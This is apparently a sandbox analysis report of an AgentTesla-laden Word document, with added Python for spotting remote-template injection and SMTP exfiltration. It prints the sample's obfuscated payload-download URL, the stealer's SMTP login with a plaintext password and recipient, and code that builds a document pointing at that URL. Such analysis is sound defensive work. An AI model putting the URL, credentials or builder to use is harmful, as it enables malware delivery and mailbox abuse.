General
Target: Sales confirmation-a13802KA.docx
Size: 10KB
Sample: 230419-jp4l4shb82
MD5: aa17844cf349edcb703a84874bf9b51f
SHA1: 9c894354e8aac4c58f111c7405a3f92d93d3da4f
SHA256: e2f7f94897d3c542e882840cd25955f9bf9e1b1507955ee144bdf939adcce73e
SHA512: a3ac31637f009b6a717999a60dcc2c5ff032db791ef5c808654b728a7746f6353f3976ab44cb5bbc97e99e1ac87f57af8433076c23dc4c595d69768bcf2f9424
SSDEEP: 192:ScIMmtPGT7G/bIwXOVOtlrV5SEzBC4vNq6sM63kp:SPXuT+xXOVOTbhlqHI
Static task: static1
Behavioral task: behavioral1 (Sample: Sales confirmation-a13802KA.docx; Resource: win7-20230220-en)
Behavioral task: behavioral2 (Sample: Sales confirmation-a13802KA.docx; Resource: win10v2004-20230221-en)
Malware Config
Extracted (URL):
http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%2IIOOOWOEOEOEOEOEOEOISISODOEOEOEOODOOOOOOWWOWOQQQOWOWOWOWOIIIDIIFIFIWOEOEOEOIFIDIFODFI@3221468051/r/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc
Extracted (agenttesla):
Protocol: smtp
Host: mail.strictfacilityservices.com
Port: 587
Username: accounts@strictfacilityservices.com
Password: SFS!@#321
Email To: zamanic62@gmail.com
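The extracted URL above has the shape of an obfuscated external relationship target: a run of percent-encoded '#' characters padding a userinfo part, an '@', and the real host written as the decimal integer 3221468051. This is consistent with a remote-template (attachedTemplate) relationship, the usual carrier behind the "Abuses OpenXML format to download file from external location" signature; the report does not say which relationship held it, so the example assumes attachedTemplate. The following Python is an added example, not tooling from the sandbox report or code from the sample: it builds a constructed, minimal OOXML package carrying that URL as an external relationship (a stand-in for the real document, which is not reproduced here), walks every .rels part for TargetMode="External", and resolves the host a fetch would actually contact. The part names and package layout are assumed to mirror a normal Word document; nothing about the real sample beyond the URL on this page is used.

```python
import io
import ipaddress
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote, urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/attachedTemplate")

# The URL the sandbox extracted from the sample, copied verbatim from the report.
EXTRACTED_URL = "http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%2IIOOOWOEOEOEOEOEOEOISISODOEOEOEOODOOOOOOWWOWOQQQOWOWOWOWOIIIDIIFIFIWOEOEOEOIFIDIFODFI@3221468051/r/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc"


def build_sample_docx(template_url: str) -> bytes:
    """Constructed stand-in for the sample (assumption: a real .docx has the
    same part names). A minimal OOXML zip whose word/_rels/settings.xml.rels
    points an attachedTemplate relationship at an external URL, the remote
    template injection shape. Not the real document."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{TEMPLATE_REL}" '
        f'Target="{template_url}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes):
    """Yield (rels part, relationship Type, Target) for every relationship
    marked TargetMode="External" anywhere in the package."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    yield name, rel.get("Type", ""), rel.get("Target", "")


def resolve_host(url: str) -> dict:
    """Work out which server a fetch of `url` really contacts.

    Two obfuscations are handled: a userinfo part stuffed with percent-encoded
    '#' (decoded, it reads like a fragment and hides what follows from a reader
    or a naive URL regex, but the fetcher still sends the request to whatever
    follows the '@'), and a host written as a plain decimal integer, which IPv4
    parsers accept as a 32-bit address. Invalid escapes such as %2I are left
    as-is by unquote(), which is what the sample's URL contains."""
    parts = urlsplit(url)
    userinfo, at, _ = parts.netloc.rpartition("@")
    host = parts.hostname or ""
    result = {
        "host": host,
        "decimal_ip": False,
        "userinfo_decoded": unquote(userinfo) if at else "",
        "path_decoded": unquote(parts.path),
    }
    if host.isdigit() and int(host) < 2**32:
        result["host"] = str(ipaddress.IPv4Address(int(host)))
        result["decimal_ip"] = True
    return result


def triage(docx_bytes: bytes) -> list:
    """Flag every external relationship and resolve its real destination."""
    findings = []
    for part, rel_type, target in external_relationships(docx_bytes):
        info = resolve_host(target)
        info.update(part=part, type=rel_type, target=target,
                    suspicious=info["decimal_ip"] or "#" in info["userinfo_decoded"])
        findings.append(info)
    return findings


if __name__ == "__main__":
    for f in triage(build_sample_docx(EXTRACTED_URL)):
        print(f"{f['part']}: {f['type'].rsplit('/', 1)[-1]} -> {f['host']} "
              f"(decimal host: {f['decimal_ip']}, suspicious: {f['suspicious']})")
```

Run against a real .docx or .dotx, the same walk reports every External target, legitimate hyperlinks included; the decimal-host and '#'-in-userinfo heuristics are what separate this sample's style from noise. The resolved host is the address to pivot on in proxy and DNS logs, since the decimal form will not match a string search for the dotted quad.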
Targets
Target: Sales confirmation-a13802KA.docx
- AgentTesla: Agent Tesla is a .NET-based remote access trojan (RAT) and information stealer.
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location
- Executes dropped EXE
- Loads dropped DLL
- Uses the VBS compiler for execution
- Accesses Microsoft Outlook profiles
- Drops file in System32 directory
- Suspicious use of SetThreadContext
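The agenttesla block in Malware Config is the stealer's exfiltration channel: it authenticates to mail.strictfacilityservices.com on port 587 as accounts@strictfacilityservices.com and mails what it collects (the "Accesses Microsoft Outlook profiles" signature above is one source) to zamanic62@gmail.com. That account is a credential the malware carries, not necessarily attacker-owned infrastructure; in this family it is often a compromised legitimate mailbox, and the report does not say how this one was obtained. As an added example, not the sandbox's tooling, the following Python turns the configuration into two checks over constructed Zeek-style smtp.log JSON records: an exact indicator match on the sender and recipient from the config, and a policy rule that a workstation should never speak SMTP submission to anything but the corporate relay, which catches the same behaviour when the credentials change. The relay address, workstation range and every log line are invented for the example; matching the SMTP host name itself would need the resolved IP from DNS or conn.log, which is left out so the block runs offline.

```python
import ipaddress
import json

# Exfiltration settings the sandbox extracted from the AgentTesla payload
# (copied from the report). The password is not needed for detection.
AGENTTESLA_SMTP = {
    "host": "mail.strictfacilityservices.com",
    "port": 587,
    "username": "accounts@strictfacilityservices.com",
    "rcptto": "zamanic62@gmail.com",
}

# Assumed environment (hypothetical values): workstations live in 10.10.0.0/16
# and the only host they may hand mail to is the corporate relay.
CORPORATE_RELAYS = {"10.0.0.25"}
WORKSTATION_NETS = [ipaddress.ip_network("10.10.0.0/16")]
SUBMISSION_PORTS = {25, 465, 587}

# Constructed Zeek-style smtp.log records (JSON lines); not real telemetry.
# Line 2 is what the extracted config would look like on the wire, line 3 a
# direct-to-internet submission with unrelated addresses, lines 1 and 4 benign.
SAMPLE_LOG = """\
{"ts": 1681900001.1, "id.orig_h": "10.10.4.21", "id.resp_h": "10.0.0.25", "id.resp_p": 25, "mailfrom": "alice@corp.example", "rcptto": ["bob@corp.example"], "subject": "Q2 numbers"}
{"ts": 1681900002.5, "id.orig_h": "10.10.4.37", "id.resp_h": "203.0.113.10", "id.resp_p": 587, "mailfrom": "accounts@strictfacilityservices.com", "rcptto": ["zamanic62@gmail.com"], "subject": "Report"}
{"ts": 1681900003.0, "id.orig_h": "10.10.9.8", "id.resp_h": "198.51.100.7", "id.resp_p": 587, "mailfrom": "jsmith@corp.example", "rcptto": ["x@example.net"], "subject": "hi"}
{"ts": 1681900004.2, "id.orig_h": "10.0.0.25", "id.resp_h": "192.0.2.44", "id.resp_p": 25, "mailfrom": "alice@corp.example", "rcptto": ["bob@partner.example"], "subject": "Q2 numbers"}
"""


def ioc_match(rec: dict) -> bool:
    """Exact match on the sender/recipient pair from the extracted config.
    High fidelity, but only for this build's credentials."""
    return (rec.get("mailfrom") == AGENTTESLA_SMTP["username"]
            or AGENTTESLA_SMTP["rcptto"] in rec.get("rcptto", []))


def workstation_direct_smtp(rec: dict) -> bool:
    """Policy rule: a workstation talking SMTP/submission to anything other
    than the corporate relay. Credential-independent, so it survives a
    re-packed sample with a fresh mailbox."""
    src = ipaddress.ip_address(rec["id.orig_h"])
    return (any(src in net for net in WORKSTATION_NETS)
            and rec["id.resp_p"] in SUBMISSION_PORTS
            and rec["id.resp_h"] not in CORPORATE_RELAYS)


def detect(log_text: str) -> list:
    """Run both rules over JSON-lines smtp.log text; one alert per record."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        reasons = []
        if ioc_match(rec):
            reasons.append("ioc:agenttesla-smtp-config")
        if workstation_direct_smtp(rec):
            reasons.append("policy:workstation-direct-smtp")
        if reasons:
            alerts.append({
                "ts": rec["ts"],
                "src": rec["id.orig_h"],
                "dst": f'{rec["id.resp_h"]}:{rec["id.resp_p"]}',
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The policy rule is the one worth keeping after this sample is forgotten: AgentTesla, and the rest of the SMTP-exfiltrating stealer families, all need a workstation to open an authenticated SMTP session to a server the organisation never sanctioned, and egress filtering on 25/465/587 to anything but the relay removes the channel outright rather than just alerting on it.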